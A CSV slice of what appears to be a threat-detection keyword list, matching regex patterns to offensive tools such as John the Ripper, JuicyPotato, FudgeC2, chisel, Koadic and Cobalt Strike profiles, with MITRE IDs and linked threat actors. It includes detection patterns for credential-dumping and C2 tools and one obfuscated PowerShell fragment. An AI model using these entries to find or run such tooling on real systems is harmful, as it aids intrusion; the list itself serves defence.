"*john.bash_completion*",".{0,1000}john\.bash_completion.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","#linux","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50104"
"*john.session.log*",".{0,1000}john\.session\.log.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","#logfile","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50105"
"*john.zsh_completion*",".{0,1000}john\.zsh_completion.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50106"
"*john/password.lst*",".{0,1000}john\/password\.lst.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50107"
"*john/run/fuzz.dic*",".{0,1000}john\/run\/fuzz\.dic.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50108"
"*john/src/ztex/*",".{0,1000}john\/src\/ztex\/.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50109"
"*john@moozle.wtf*",".{0,1000}john\@moozle\.wtf.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","#email","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","50110"
"*john_crack_asrep*",".{0,1000}john_crack_asrep.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50111"
"*john_crack_kerberoast*",".{0,1000}john_crack_kerberoast.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50112"
"*john_log_format*",".{0,1000}john_log_format.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50113"
"*john_mpi.c*",".{0,1000}john_mpi\.c.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50114"
"*john_register_all*",".{0,1000}john_register_all.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50115"
"*JohnHammond/recaptcha-phish*",".{0,1000}JohnHammond\/recaptcha\-phish.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","1","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","50116"
"*JohnTheRipper *",".{0,1000}JohnTheRipper\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50117"
"*JohnTheRipper/*",".{0,1000}JohnTheRipper\/.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50118"
"*JohnWoodman/stealthInjector*",".{0,1000}JohnWoodman\/stealthInjector.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","50119"
"*Join us on Telegram - https://t.me/thcorg*",".{0,1000}Join\sus\son\sTelegram\s\-\shttps\:\/\/t\.me\/thcorg.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#content #linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","50120"
"*-JoiN'*[StrIng]::JOIn(* -SPlIt*-sPlit*-SpLiT*-sPlIt*-sPLIt* | fOreacH-obJeCT {( [Int]$_-As[ChAr]) })))"" 1> \Windows\Temp\*",".{0,1000}\-JoiN\'.{0,1000}\[StrIng\]\:\:JOIn\(.{0,1000}\s\-SPlIt.{0,1000}\-sPlit.{0,1000}\-SpLiT.{0,1000}\-sPlIt.{0,1000}\-sPLIt.{0,1000}\s\|\sfOreacH\-obJeCT\s\{\(\s\[Int\]\$_\-As\[ChAr\]\)\s\}\)\)\)\""\s1\>\s\\Windows\\Temp\\.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","50121"
"*jojonas/SharpSAMDump*",".{0,1000}jojonas\/SharpSAMDump.{0,1000}","offensive_tool_keyword","SharpSAMDump","SAM dumping via the registry in C#/.NET","T1003.002 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/jojonas/SharpSAMDump","1","1","N/A","N/A","10","1","48","8","2025-01-16T07:08:58Z","2024-05-27T10:53:27Z","50128"
"*Jomungand\vstudio-project*",".{0,1000}Jomungand\\vstudio\-project.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","N/A","10","","N/A","","","","50129"
"*Jomungand-main*",".{0,1000}Jomungand\-main.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","N/A","10","","N/A","","","","50130"
"*joomscan -u *",".{0,1000}joomscan\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50131"
"*joomscan*",".{0,1000}joomscan.{0,1000}","offensive_tool_keyword","joomscan","Joomla Vulnerability Scanner.","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","EMBER BEAR","Vulnerability Scanner","https://github.com/rezasp/joomscan","1","0","N/A","N/A","N/A","10","1118","244","2024-09-11T09:08:50Z","2016-09-01T09:06:17Z","50132"
"*Jormungand.exe*",".{0,1000}Jormungand\.exe.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","N/A","10","","N/A","","","","50133"
"*Jormungand.vcxproj*",".{0,1000}Jormungand\.vcxproj.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","N/A","10","","N/A","","","","50134"
"*Jormungandr.cpp*",".{0,1000}Jormungandr\.cpp.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","N/A","3","228","27","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z","50135"
"*Jormungandr.exe*",".{0,1000}Jormungandr\.exe.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","N/A","3","228","27","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z","50136"
"*Jormungandr-master*",".{0,1000}Jormungandr\-master.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","N/A","3","228","27","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z","50137"
"*journalctl -u isc-dhcp-server.service | tail -n 50*",".{0,1000}journalctl\s\-u\sisc\-dhcp\-server\.service\s\|\stail\s\-n\s50.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","50138"
"*jp.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}jp\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","50139"
"*JPG0mez/ADCSync*",".{0,1000}JPG0mez\/ADCSync.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","1","N/A","N/A","9","3","205","22","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z","50140"
"*jpillora/chisel*",".{0,1000}jpillora\/chisel.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","1","#linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","50142"
"*jplesueur@phrozen.io*",".{0,1000}jplesueur\@phrozen\.io.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#email","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","50143"
"*jqlcrn2fsfvxlngdq53rqyrwtwfrulup74xyle54bsvo3l2kgpeeijid.onion*",".{0,1000}jqlcrn2fsfvxlngdq53rqyrwtwfrulup74xyle54bsvo3l2kgpeeijid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50148"
"*jquery-c2.*.profile*",".{0,1000}jquery\-c2\..{0,1000}\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","1","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","50149"
"*js-cracker-client/cracker.js*",".{0,1000}js\-cracker\-client\/cracker\.js.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","50150"
"*JScriptStager*",".{0,1000}JScriptStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","50151"
"*jtee43gt-6543-2iur-9422-83r5w27hgzaq*",".{0,1000}jtee43gt\-6543\-2iur\-9422\-83r5w27hgzaq.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","50152"
"*juicycreds_dump*",".{0,1000}juicycreds_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50153"
"*JuicyPotato v%s*",".{0,1000}JuicyPotato\sv\%s.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50154"
"*JuicyPotato v%s*",".{0,1000}JuicyPotato\sv\%s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","JuicyPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50155"
"*JuicyPotato.exe*",".{0,1000}JuicyPotato\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50156"
"*JuicyPotato.exe*",".{0,1000}JuicyPotato\.exe.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50157"
"*JuicyPotato.exe*",".{0,1000}JuicyPotato\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","JuicyPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50158"
"*JuicyPotato.exe*",".{0,1000}JuicyPotato\.exe.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","50159"
"*JuicyPotato.sln*",".{0,1000}JuicyPotato\.sln.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50160"
"*JuicyPotato.vcxproj*",".{0,1000}JuicyPotato\.vcxproj.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50161"
"*juicypotato.x64.dll*",".{0,1000}juicypotato\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50162"
"*juicypotato.x86.dll*",".{0,1000}juicypotato\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50163"
"*juicypotato_reflective.dll*",".{0,1000}juicypotato_reflective\.dll.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","50164"
"*JuicyPotatoNG.cpp*",".{0,1000}JuicyPotatoNG\.cpp.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","50165"
"*JuicyPotatoNG.exe*",".{0,1000}JuicyPotatoNG\.exe.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","50166"
"*JuicyPotatoNG.sln*",".{0,1000}JuicyPotatoNG\.sln.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","50167"
"*JuicyPotatoNG.txt*",".{0,1000}JuicyPotatoNG\.txt.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","50168"
"*JuicyPotatoNG.zip*",".{0,1000}JuicyPotatoNG\.zip.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","50169"
"*JuicyPotatoNG-main*",".{0,1000}JuicyPotatoNG\-main.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","50170"
